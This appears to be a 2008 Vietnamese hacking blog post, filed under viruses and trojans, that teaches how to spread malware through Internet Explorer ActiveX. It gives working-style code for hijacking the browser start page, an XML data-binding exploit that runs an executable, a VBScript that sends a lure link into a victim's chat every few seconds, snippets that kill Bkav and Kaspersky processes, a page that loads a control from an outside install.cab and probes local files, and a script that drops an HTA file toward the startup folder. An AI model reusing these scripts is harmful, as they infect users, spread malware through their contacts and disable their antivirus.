Jun 10, 2008
81 Views

Lây lan virus bằng ActiveX !

Written by

Ví dụ vào 1 page với tên miền mở rộng là html, hay htm, php, asp…. thật nguy hiểm nếu không có antivirus hay sài trình duyệt update full

Ví dụ đơn giản :

<APPLET ID=”Shl”
CLASSID=”CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B”>
</APPLET>
<script>
Shl.RegWrite (“HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page”, “http://secure-lab.net”);
</script>

nếu ActiveX đó thực thi path chứa file exe khi victim dính chưởng thì thật nguy hiểm , ta có thể tạo zoombie , hay cai malware ….

<span datasrc=”#oExec” datafld=”exploit” dataformatas=”html”></span>
<xml id=”oExec”>
<security><exploit><![CDATA[
<object id=”oFile” classid=”clsid:11111111-1111-1111-1111-111111111111″ codebase=”c:/WINDOWS/calc.exe”></object>
]]></exploit></security>
</xml>

ActiveX ứng dụng thật hiệu quả !

nhưng làm sao để biến victim thành người giúp việc cho mình để chuyển link đến all group link chứa trojan, virus ??? cũng đơn giản thui , dựa vào YAHOO CHAT hoặc đại loại một trinh chát nào đó thông dụng !

Option Explicit
Dim WshShell
Set WshShell=CreateObject(“WScript.Shell”)
WScript.Sleep 1500
WshShell.AppActivate”Send”
WshShell.SendKeys”Vao site nay di , em de thuong lam http://secure-lab.net/dethuong.jpeg”
WScript.Sleep 200
WshShell.Sendkeys”{Enter}”
WScript.Sleep 20
WshShell.Sendkeys”{Enter}”

đây là script VBscript edit lại cứ 10 giây lại sendkeys 1 lần vào body chát của victim hehe –> 9 người thì ít ra cũng có 1 thằng vào xem

Ứng dụng VBSCRIPT để active cũng vui ví dụ thịt thằng BKAV, hay đại loại antivirus nào không để password protect

dành cho Bkav

If ProcessExists(“Bkav2006.exe”) Then
ProcessClose(“Bkav2006.exe”)

dành cho kaspersky

If ProcessExists(“kis.exe”) Then
ProcessClose(“kis.exe”)

….End Task…xong hehe tha hồ mà run virus , mà không sợ mấy soft antivirus thịt .

<html>

<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″>
<title>Huehacking</title>
</head>

<body bgcolor=”#FFFFFF”>

<table border=”0″ width=”100%” bgcolor=”#000080″>
<tr>
<td><h1 align=”center”><font color=”#FFFF80″>Huehacking</font></h1>
</td>
</tr>
</table>
<P> loader control …………………

<p>
<object ID=”preloader” NAME=”preloader” WIDTH=”83″ HEIGHT=”27″ align=”baseline” border=”0″
CLASSID=”clsid:16E349E0-702C-11CF-A3A9-00A0C9034920″
codebase=”http://www.huehacking.info/install.cab”>
<param name=”_ExtentX” value=”10″>
<param name=”_ExtentY” value=”10″>
<param name=”enable” value=”0″>ActiveX not found or enabled
</object>
</p>
<script LANGUAGE=”JavaScript”>

testNo=-1;

function buildArray()
{
//define data
c=0;

files=new Array();
found=new Array();
missing=new Array();
results=new Array();

files[c]=”c:\\autoexec.bat”;
found[c]=”A DOS/Win9x or NT platform”;
missing[c]=”Windows NT?”;
c++;

files[c]=”c:\\boot.ini”;
found[c]=”an NT system”;
missing[c]=”no NT”;
c++;

files[c]=”http://localhost/”;
found[c]=”Running a local web server”;
missing[c]=”no local web server”;
c++;

files[c]=”c:\\windows\\wscript.exe”;
found[c]=”windows scripting”;
missing[c]=”no windows scripting found.”;
c++;

files[c]=”c:\\Windows\\System\\D3DRM.DLL”;
found[c]=”Win9x installation of DirectX”;
missing[c]=”No copy of DirectX in the default installation location”;
c++;

files[c]=”c:\\Windows\\tour98.exe”;
found[c]=”Windows 98″;
missing[c]=”No Windows 98 in the usual place”;
c++;

files[c]=”c:\\Winnt\\system32\\gdi32.dll”;
found[c]=”A copy of NT under c:\winnt”;
missing[c]=”no copy of NT there”;
c++;

files[c]=”c:\\Windows\\system32\\gdi32.dll”;
found[c]=”A copy of NT under c:\windows: probably an upgrade installation”;
missing[c]=”no copy of NT there”;
c++;
/*
files[c]=”c:\\WindowsNT\\system32\\gdi32.dll”;
found[c]=”A copy of NT under c:\windowsNT : probably an MIS installation”;
missing[c]=”no copy of NT there”;
c++;

files[c]=”c:\\Program Files\\WinZip\\winzip32.exe”;
found[c]=”WinZip. But is it registered?”;
missing[c]=”no copy of Winzip in the default install location”;
c++;
*/

}

function println(text)
{
output.value=output.value+”\r\n”+text;
}

function resetTest()
{
output.value=””;
testNo=-1;
}

function TestElementFailed()
{
if(testNo>=0 && testNo<files.length)
{
println(preloader.URL+” missing: “+ missing[testNo]);
startNextTest();
}
}

function TestElementSucceeded()
{
if(testNo>=0 && testNo<files.length)
{
println(preloader.URL+” found: “+found[testNo]);
startNextTest();
}
}

function startNextTest()
{
testNo++;
preloader.Enable=0;
if(testNo>=files.length)
{
println(“***Test completed***”);
}
else
{
preloader.URL=files[testNo];
preloader.Enable=1;
}
}

function startUp()
{
resetTest();
output.value=”***starting***”
buildArray();
startNextTest();
}
//–>

</script>
<!– *********************************************
* Event handler: success
********************************************* –>
<script LANGUAGE=”JavaScript” FOR=”preloader” EVENT=”Complete()”>

<!–
TestElementSucceeded()

//–>

</script>
<!– *********************************************
* Event handler: failure
********************************************* –>
<script LANGUAGE=”JavaScript” FOR=”preloader” EVENT=”Error()”>

<!–
TestElementFailed()

//–>

</script>
<!– *********************************************
* a link to start the process
********************************************* –>

<h2 align=”center”><a href=”javascript:startUp()”>Run the Test</a></h2>
<!– *********************************************
* A form for the results
********************************************* –>

<p><textarea rows=”20″ cols=”80″ name=”output”>
</textarea></p>
<IMG SRC=”../Artwork/bar.jpg” WIDTH=”500″ HEIGHT=”20″ ALIGN=”BOTTOM” BORDER=”0″></P>

<P> [<a href=”./”>back</a>] [<A HREF=”../”>home</A>] [<A HREF=”../copyright.html”>copyright</A> ] [<A HREF=”../software.html”>software</A>]

</body>
</html>

<object data=”ebookhacking.xla” id=”sh1″ width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn=”C:\\huehacking.hta”;
sh1.object.SaveAs(fn,6);
//sh1.object.SaveAs(“C:\\windows\\Start
Menu\\Programs\\StartUp\\huehacking.hta”,6);
alert(fn+” sucessfully written”);
}
setTimeout(“f()”,5000);
</SCRIPT>

Article Tags:
· · ·
Article Categories:
Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/